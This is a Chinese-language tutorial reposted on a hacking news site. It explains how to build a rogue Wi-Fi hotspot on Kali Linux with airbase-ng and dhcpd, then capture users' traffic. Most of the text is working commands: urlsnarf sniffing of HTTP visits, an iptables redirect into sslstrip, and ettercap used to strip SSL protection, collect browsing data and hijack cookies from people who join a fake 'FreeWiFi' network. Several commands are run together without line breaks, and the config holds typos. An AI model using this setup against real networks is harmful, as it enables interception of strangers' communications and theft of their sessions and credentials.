欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

Kali-linux下创建wifi热点(wifi绵羊墙搭建)

来源:本站整理 作者:佚名 时间:2016-10-13 TAG: 我要投稿

方案1:
iwconfig命令查看是否成功识别
airmon-ng命令查看无线网卡情况,找到接入的USB无线网卡名称,
airmon-ng start wlan2命令使USB无线网卡工作在监听模式;
 
airbase-ng –e “KFC” –c 11 wlan0mon命令并回车,这样就生成了一个工作在11频道、SSID名称为“KFC”的热点;
 
ifconfig –a命令,查看接口网卡at0是否存在,确认存在后,
 
ifconfig at0 up命令启动接口网卡at0;
 
配置DHCP服务的各项参数,
vim /etc/dhcp/dhcpd.conf命令并回车,开始编辑isc-dhcpd软件的配置文件,其中:
ddns-update-style none表示不自动更新DNS与DHCP服务器的动态信息
subnet 192.168.100.0 netmask 255.255.255.0表示IP地址段为192.168.100.0/24,子网掩码为255.255.255.0
range 192.168.100.50 192.168.100.100表示用于分配的IP地址为.50-.200
option subnet-mask 设置子网掩码,option broadcast-address设置广播地址
option routers 192.168.100.1表示设置网关为192.168.100.1
option domain-name-servers 10.0.1.106表示设置DNS解析服务器为10.0.1.106
 
配置详细:
subnet 192.168.100.0 netmask 255.255.255.0 {
range 192.168.100.50 192.168.100.200;
option subnet-mask255.255.255.0;  #子网掩码
option broadcast-address192.168.100.255; #广播地址
option routers192.168.100.1; #网关
option domain-name-sercers10.0.1.106; #DNS解析服务器,.106这个ip是bt5的(另外一台虚拟机)
default-lease-time 21600;
max-lease-time 43200;
}
 
编辑好后,按“Esc”键,敲入“:wq”保存退出.
ifconfig at0 192.168.100.1 netmask 255.255.255.0命令并回车,设置接口网卡at0的ip地址和子网掩码;
route add –net 192.168.100.0 netmask 255.255.255.0 gw 192.168.100.1命令并回车,表示增加一条路由记录,使192.168.100.1网关生效;
dhcpd –d –f –cf /etc/dhcp/dhcpd.conf at0命令并回车,启动DHCP服务;
 
打开新的终端
echo 1 > /proc/sys/net/ipv4/ip_forward命令并回车,开启系统数据转发功能;
iptables –t nat –A POSTROUTING --out-interface eth0 –j MASQUERADE命令并回车,设置iptables转发,将所有数据转发到eth0网卡;
urlsnarf –i at0启动urlsnarf软件,嗅探输出at0网卡上所有HTTP访问记录;
 
 
方案2:使用 airbase-ng + dhcpd 创建虚拟WiFi热点;顺便使用 sslstrip+ettercap 进行中间人攻击,嗅探使用者的上网信息和劫持cookie!
所需要的软件如下;kali-linux都已经自带了,其他的系统可以自行安装:Aircrack-ng 套件    #用来发送数据isc-dhcp-server    #简单的dhcp服务器sslstrip       #突破ssl加密ettercap      #嗅探劫持
vim /etc/dhcp/dhcpd.conf   编辑dhcp服务器配置文件,修改如下:
authoritative;default-lease-time 700;max-lease-time 8000;subnet 10.0.0.0 netmask 255.255.255.0 {option routers 10.0.0.1;option subnet-mask 255.255.255.0;option domain-name "FreeWiFi";option domain-name-servers 10.0.0.1;range 10.0.0.10 10.0.0.100; }
然后激活网卡至监听模式:airmon-ng start wlan0airbase-ng -e FreeWiFi -c 6 mon0此时虚拟wifi的信号已经发送出去了,如果出现错误:Error: Got channel -1, expected a value > 0.执行如下命令:
airmon-ng stop mon0
ifconfig wlan0 downiwconfig wlan0 mode monitorifconfig wlan0 up
然后从激活网卡至监听模式那里重新开始。接着执行如下命令:
ifconfig at0 upifconfig at0 10.0.0.1 netmask 255.255.255.0ifconfig at0 mtu 1400route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1iptables --flushiptables --table nat --flushiptables --delete-chainiptables --table nat --delete-chainecho 1 > /proc/sys/net/ipv4/ip_forwardiptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1iptables -P FORWARD ACCEPTiptables --append FORWARD --in-interface at0 -j ACCEPTiptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADEiptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0/etc/init.d/isc-dhcp-server start
虚拟WiFir热点创建成功,接下来就是嗅探欺骗钓鱼了:
sslstrip -fpk 10000ettercap -Tpuqi at0
 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载